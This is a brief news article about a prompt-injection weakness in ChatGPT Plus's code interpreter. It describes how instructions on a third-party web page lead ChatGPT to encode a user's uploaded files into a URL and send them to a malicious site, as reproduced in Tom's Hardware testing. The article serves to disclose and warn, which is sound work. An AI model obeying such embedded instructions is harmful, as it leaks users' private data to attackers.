The Latest ChatGPT Update Raises Questions About Data Safety

File Uploading in ChatGPT Plus Raises Concerns About Potential Future Issues” “Recent ChatGPT Updates, Including the Code Interpreter, Raise Security Concerns, Highlighted by Research from Johann Rehberger and Tom’s Hardware”

The Latest ChatGPT Update Raises Questions About Data Safety
The Latest ChatGPT Update Raises Questions About Data Safety

The latest ChatGPT Plus update introduces new features, including DALL-E image generation and the code interpreter for Python execution and file analysis. However, the sandbox environment poses security risks with vulnerability to prompt injection attacks.

The Latest ChatGPT Update Raises Questions About Data Safety

“For a while now, ChatGPT has been susceptible to a known vulnerability. The attack works by deceiving ChatGPT into following instructions from a third-party URL. This prompts the model to encode uploaded files into a URL-friendly string and transmit the data to a malicious website. Although the probability of such an attack depends on specific conditions (like the user actively pasting a malicious URL into ChatGPT), the potential risk is unsettling.

Exploring the Diverse Threat Scenarios and Extensive Testing

This security threat could manifest through different scenarios, including a trusted website getting compromised with a malicious prompt or through social engineering tactics.

Tom’s Hardware conducted thorough testing to assess the potential vulnerability of users to this attack. They tested the exploit by generating a simulated environment variables file and utilized ChatGPT to process and unintentionally send this data to an external server. While the effectiveness of the exploit fluctuated in different sessions (with instances of ChatGPT refusing to load external pages or transmit file data), the results highlight substantial security concerns. This is particularly concerning considering the AI’s capability to read and execute Linux commands and manage user-uploaded files within a Linux-based virtual environment.

Tom’s Hardware emphasizes the significance of this security loophole, as it is unexpected for ChatGPT to execute instructions from external web pages. Despite this unexpected behavior, OpenAI has not yet responded to Mashable’s request for comment on the matter.

Check These Out

LEAVE A REPLY

Please enter your comment!
Please enter your name here